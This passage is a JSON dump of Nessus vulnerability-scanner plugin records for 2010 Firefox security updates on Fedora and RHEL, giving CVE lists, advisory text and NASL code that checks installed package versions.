"https://bugzilla.redhat.com/show_bug.cgi?id=642300", "https://bugzilla.redhat.com/show_bug.cgi?id=642272", "https://bugzilla.redhat.com/show_bug.cgi?id=642290"], "pluginID": "50403", "description": "Update to new upstream Firefox version 3.6.12, fixing multiple security issues detailed in the upstream advisories :\n\n - http://www.mozilla.org/security/known-vulnerabilities/fi refox36.html#firefox3.6.11\n\n - http://www.mozilla.org/security/known-vulnerabilities/ firefox36.html#firefox3.6.12\n\nUpdate also includes all packages depending on gecko-libs rebuilt against new version of Firefox / XULRunner.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 4, "reporter": "Tenable", "published": "2010-10-29T00:00:00", "title": "Fedora 14 : firefox-3.6.12-1.fc14 / galeon-2.0.7-35.fc14.1 / gnome-python2-extras-2.25.3-25.fc14.1 / etc (2010-16897)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2016-05-20T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:xulrunner", "p-cpe:/a:fedoraproject:fedora:firefox", "p-cpe:/a:fedoraproject:fedora:perl-Gtk2-MozEmbed", "cpe:/o:fedoraproject:fedora:14", "p-cpe:/a:fedoraproject:fedora:gnome-python2-extras", "p-cpe:/a:fedoraproject:fedora:gnome-web-photo", "p-cpe:/a:fedoraproject:fedora:galeon", "p-cpe:/a:fedoraproject:fedora:mozvoikko"], "id": "FEDORA_2010-16897.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50403", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2010-16897.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50403);\n script_version(\"$Revision: 1.18 $\");\n script_cvs_date(\"$Date: 2016/05/20 13:54:17 $\");\n\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3182\", \"CVE-2010-3183\", \"CVE-2010-3765\");\n script_bugtraq_id(44243, 44245, 44247, 44248, 44249, 44251, 44252, 44253, 44425);\n script_xref(name:\"FEDORA\", value:\"2010-16897\");\n\n script_name(english:\"Fedora 14 : firefox-3.6.12-1.fc14 / galeon-2.0.7-35.fc14.1 / gnome-python2-extras-2.25.3-25.fc14.1 / etc (2010-16897)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to new upstream Firefox version 3.6.12, fixing multiple\nsecurity issues detailed in the upstream advisories :\n\n -\n http://www.mozilla.org/security/known-vulnerabilities/fi\n refox36.html#firefox3.6.11\n\n -\n http://www.mozilla.org/security/known-vulnerabilities/\n firefox36.html#firefox3.6.12\n\nUpdate also includes all packages depending on gecko-libs rebuilt\nagainst new version of Firefox / XULRunner.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.mozilla.org/security/known-vulnerabilities/firefox36.html#firefox3.6.11\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ebdf7518\"\n );\n # http://www.mozilla.org/security/known-vulnerabilities/firefox36.html#firefox3.6.12\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8a7474ff\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642272\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642275\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642277\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642283\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642286\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642290\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642294\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642300\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=646997\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/050074.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5e5101ce\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/050075.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d414eb29\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/050076.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c2308b45\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/050077.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d6343bde\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/050078.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3b69c90e\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/050079.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0f9a0937\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/050080.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1d35dfe9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Firefox Interleaved document.write/appendChild Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:galeon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gnome-python2-extras\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gnome-web-photo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mozvoikko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:perl-Gtk2-MozEmbed\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xulrunner\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:14\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^14([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 14.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC14\", reference:\"firefox-3.6.12-1.fc14\")) flag++;\nif (rpm_check(release:\"FC14\", reference:\"galeon-2.0.7-35.fc14.1\")) flag++;\nif (rpm_check(release:\"FC14\", reference:\"gnome-python2-extras-2.25.3-25.fc14.1\")) flag++;\nif (rpm_check(release:\"FC14\", reference:\"gnome-web-photo-0.9-15.fc14.1\")) flag++;\nif (rpm_check(release:\"FC14\", reference:\"mozvoikko-1.0-16.fc14.1\")) flag++;\nif (rpm_check(release:\"FC14\", reference:\"perl-Gtk2-MozEmbed-0.08-6.fc14.21\")) flag++;\nif (rpm_check(release:\"FC14\", reference:\"xulrunner-1.9.2.12-1.fc14\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox / galeon / gnome-python2-extras / gnome-web-photo / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-29T19:17:54", "references": ["http://www.mozilla.com/en-US/firefox/3.6.12/releasenotes/", "http://www.mozilla.com/en-US/firefox/3.6.11/releasenotes/", "https://access.redhat.com/security/cve/cve-2010-3175", "https://access.redhat.com/security/cve/cve-2010-3182", "https://access.redhat.com/security/cve/cve-2010-3180", "https://access.redhat.com/security/cve/cve-2010-3183", "https://access.redhat.com/security/cve/cve-2010-3178", "http://www.mozilla.org/security/known-vulnerabilities/firefox36.html#", "https://access.redhat.com/security/cve/cve-2010-3179", "https://access.redhat.com/security/cve/cve-2010-3765", "https://access.redhat.com/errata/RHSA-2010:0861", "https://access.redhat.com/security/cve/cve-2010-3177", "https://access.redhat.com/security/cve/cve-2010-3176"], "pluginID": "50633", "description": "Updated firefox packages that fix several security issues are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nMozilla Firefox is an open source web browser. XULRunner provides the XUL Runtime environment for Mozilla Firefox.\n\nA race condition flaw was found in the way Firefox handled Document Object Model (DOM) element properties. Malicious HTML content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2010-3765)\n\nSeveral flaws were found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2010-3175, CVE-2010-3176, CVE-2010-3179, CVE-2010-3183, CVE-2010-3180)\n\nA flaw was found in the way the Gopher parser in Firefox converted text into HTML. A malformed file name on a Gopher server could, when accessed by a victim running Firefox, allow arbitrary JavaScript to be executed in the context of the Gopher domain. (CVE-2010-3177)\n\nA same-origin policy bypass flaw was found in Firefox. An attacker could create a malicious web page that, when viewed by a victim, could steal private data from a different website the victim had loaded with Firefox. (CVE-2010-3178)\n\nA flaw was found in the script that launches Firefox. The LD_LIBRARY_PATH variable was appending a '.' character, which could allow a local attacker to execute arbitrary code with the privileges of a different user running Firefox, if that user ran Firefox from within an attacker-controlled directory. (CVE-2010-3182)\n\nFor technical details regarding these flaws, refer to the Mozilla security advisories for Firefox 3.6.11 and 3.6.12. You can find links to the Mozilla advisories in the References section of this erratum.\n\nAll Firefox users should upgrade to these updated packages, which contain Firefox version 3.6.12, which corrects these issues. After installing the update, Firefox must be restarted for the changes to take effect.", "edition": 10, "reporter": "Tenable", "published": "2010-11-18T00:00:00", "title": "RHEL 6 : firefox (RHSA-2010:0861)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2018-11-28T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:xulrunner-debuginfo", "p-cpe:/a:redhat:enterprise_linux:xulrunner", "p-cpe:/a:redhat:enterprise_linux:firefox", "p-cpe:/a:redhat:enterprise_linux:firefox-debuginfo", "p-cpe:/a:redhat:enterprise_linux:xulrunner-devel", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.0"], "id": "REDHAT-RHSA-2010-0861.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50633", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0861. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50633);\n script_version (\"1.25\");\n script_cvs_date(\"Date: 2018/11/28 11:42:05\");\n\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3182\", \"CVE-2010-3183\", \"CVE-2010-3765\");\n script_bugtraq_id(44243, 44245, 44247, 44248, 44249, 44251, 44252, 44253, 44425);\n script_xref(name:\"RHSA\", value:\"2010:0861\");\n\n script_name(english:\"RHEL 6 : firefox (RHSA-2010:0861)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated firefox packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMozilla Firefox is an open source web browser. XULRunner provides the\nXUL Runtime environment for Mozilla Firefox.\n\nA race condition flaw was found in the way Firefox handled Document\nObject Model (DOM) element properties. Malicious HTML content could\ncause Firefox to crash or, potentially, execute arbitrary code with\nthe privileges of the user running Firefox. (CVE-2010-3765)\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2010-3175, CVE-2010-3176, CVE-2010-3179,\nCVE-2010-3183, CVE-2010-3180)\n\nA flaw was found in the way the Gopher parser in Firefox converted\ntext into HTML. A malformed file name on a Gopher server could, when\naccessed by a victim running Firefox, allow arbitrary JavaScript to be\nexecuted in the context of the Gopher domain. (CVE-2010-3177)\n\nA same-origin policy bypass flaw was found in Firefox. An attacker\ncould create a malicious web page that, when viewed by a victim, could\nsteal private data from a different website the victim had loaded with\nFirefox. (CVE-2010-3178)\n\nA flaw was found in the script that launches Firefox. The\nLD_LIBRARY_PATH variable was appending a '.' character, which could\nallow a local attacker to execute arbitrary code with the privileges\nof a different user running Firefox, if that user ran Firefox from\nwithin an attacker-controlled directory. (CVE-2010-3182)\n\nFor technical details regarding these flaws, refer to the Mozilla\nsecurity advisories for Firefox 3.6.11 and 3.6.12. You can find links\nto the Mozilla advisories in the References section of this erratum.\n\nAll Firefox users should upgrade to these updated packages, which\ncontain Firefox version 3.6.12, which corrects these issues. After\ninstalling the update, Firefox must be restarted for the changes to\ntake effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3175\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3176\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3177\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3178\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3179\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3180\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3182\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3183\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3765\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.com/en-US/firefox/3.6.11/releasenotes/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.com/en-US/firefox/3.6.12/releasenotes/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/known-vulnerabilities/firefox36.html#\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2010:0861\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Firefox Interleaved document.write/appendChild Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:firefox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xulrunner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xulrunner-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xulrunner-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0861\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"firefox-3.6.12-1.el6_0\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"firefox-3.6.12-1.el6_0\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"firefox-3.6.12-1.el6_0\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"firefox-debuginfo-3.6.12-1.el6_0\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"firefox-debuginfo-3.6.12-1.el6_0\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"firefox-debuginfo-3.6.12-1.el6_0\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"xulrunner-1.9.2.12-1.el6_0\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"xulrunner-debuginfo-1.9.2.12-1.el6_0\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"xulrunner-devel-1.9.2.12-1.el6_0\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox / firefox-debuginfo / xulrunner / xulrunner-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:07:50", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=642286", "http://www.nessus.org/u?413f0147", "https://bugzilla.redhat.com/show_bug.cgi?id=642294", "http://www.nessus.org/u?5e2e67ea", "https://bugzilla.redhat.com/show_bug.cgi?id=642275", "http://www.nessus.org/u?cd4f6a09", "http://www.nessus.org/u?c331941d", "https://bugzilla.redhat.com/show_bug.cgi?id=642277", "https://bugzilla.redhat.com/show_bug.cgi?id=642283", "https://bugzilla.redhat.com/show_bug.cgi?id=646997", "http://www.nessus.org/u?f01fc443", "http://www.nessus.org/u?e237b4ed", "http://www.nessus.org/u?5084c6e0", "http://www.nessus.org/u?b38de3df", "https://bugzilla.redhat.com/show_bug.cgi?id=642300", "http://www.nessus.org/u?7b4c5e7c", "https://bugzilla.redhat.com/show_bug.cgi?id=642272", "https://bugzilla.redhat.com/show_bug.cgi?id=642290"], "pluginID": "50422", "description": "Update to new upstream Firefox version 3.5.15, fixing multiple security issues detailed in the upstream advisories :\n\n - http://www.mozilla.org/security/known-vulnerabilities/fi refox35.html#firefox3.5.14\n\n - http://www.mozilla.org/security/known-vulnerabilities/ firefox35.html#firefox3.5.15\n\nUpdate also includes packages depending on gecko-libs rebuilt against new version of Firefox / XULRunner.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 4, "reporter": "Tenable", "published": "2010-11-01T00:00:00", "title": "Fedora 12 : firefox-3.5.15-1.fc12 / galeon-2.0.7-27.fc12 / gnome-python2-extras-2.25.3-22.fc12 / etc (2010-16885)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2016-05-20T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:xulrunner", "p-cpe:/a:fedoraproject:fedora:firefox", "p-cpe:/a:fedoraproject:fedora:perl-Gtk2-MozEmbed", "cpe:/o:fedoraproject:fedora:12", "p-cpe:/a:fedoraproject:fedora:gnome-python2-extras", "p-cpe:/a:fedoraproject:fedora:gnome-web-photo", "p-cpe:/a:fedoraproject:fedora:galeon", "p-cpe:/a:fedoraproject:fedora:mozvoikko"], "id": "FEDORA_2010-16885.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50422", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2010-16885.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50422);\n script_version(\"$Revision: 1.19 $\");\n script_cvs_date(\"$Date: 2016/05/20 13:54:17 $\");\n\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3182\", \"CVE-2010-3183\", \"CVE-2010-3765\");\n script_bugtraq_id(44243, 44245, 44247, 44248, 44249, 44251, 44252, 44253, 44425);\n script_xref(name:\"FEDORA\", value:\"2010-16885\");\n\n script_name(english:\"Fedora 12 : firefox-3.5.15-1.fc12 / galeon-2.0.7-27.fc12 / gnome-python2-extras-2.25.3-22.fc12 / etc (2010-16885)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to new upstream Firefox version 3.5.15, fixing multiple\nsecurity issues detailed in the upstream advisories :\n\n -\n http://www.mozilla.org/security/known-vulnerabilities/fi\n refox35.html#firefox3.5.14\n\n -\n http://www.mozilla.org/security/known-vulnerabilities/\n firefox35.html#firefox3.5.15\n\nUpdate also includes packages depending on gecko-libs rebuilt against\nnew version of Firefox / XULRunner.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.mozilla.org/security/known-vulnerabilities/firefox35.html#firefox3.5.14\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5e2e67ea\"\n );\n # http://www.mozilla.org/security/known-vulnerabilities/firefox35.html#firefox3.5.15\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c331941d\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642272\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642275\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642277\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642283\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642286\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642290\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 